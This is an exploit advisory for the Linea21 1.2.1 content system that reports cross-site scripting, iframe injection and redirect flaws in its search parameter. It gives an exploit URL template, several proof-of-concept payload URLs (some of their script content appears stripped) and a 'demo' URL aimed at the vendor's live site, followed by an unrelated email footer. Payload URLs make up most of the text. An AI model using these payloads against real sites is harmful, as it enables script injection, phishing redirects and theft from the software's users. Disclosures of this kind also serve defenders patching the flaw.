_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_ _0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_ _0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_ _____0______0______0__0______0___0__0________0___0__00000__0___0_ _0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_ _________________________________________________________________ #[+] Linea 21 version 1.2.1 (search) XSS, Iframe Injection and Redirect Vulnerability #[+] #[+] Download : http://www.linea21.com/index.php/Actualites #[+] #[+] Discovered By 599eme Man #[+] #[+] Flouf@live.fr #[------------------------------------------------------------------------------] # # # [+] Exploit : # # http://site.com/public/index.php?search=[XSS/IFRAME/REDIRECT]&rub=resultats-recherche&valid.x=4&valid.y=6&valid=valider # # [+] P0C : # # http://site.com/public/index.php?search="'>&rub=resultats-recherche&valid.x=4&valid.y=6&valid=valider # # http://site.com/public/index.php?search=%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E&rub=resultats-recherche&valid.x=4&valid.y=6&valid=valider # # http://site.com/public/index.php?search=&rub=resultats-recherche&valid.x=4&valid.y=6&valid=valider # #[------------------------------------------------------------------------------] # # # [+] Demo : # # http://fr.linea21.com/public/index.php?search="'>&rub=resultats-recherche&valid.x=4&valid.y=6&valid=valider ######################################################################################################### _________________________________________________________________ Vous voulez savoir ce que vous pouvez faire avec le nouveau Windows Live ? Lancez-vous ! http://www.microsoft.com/windows/windowslive/default.aspx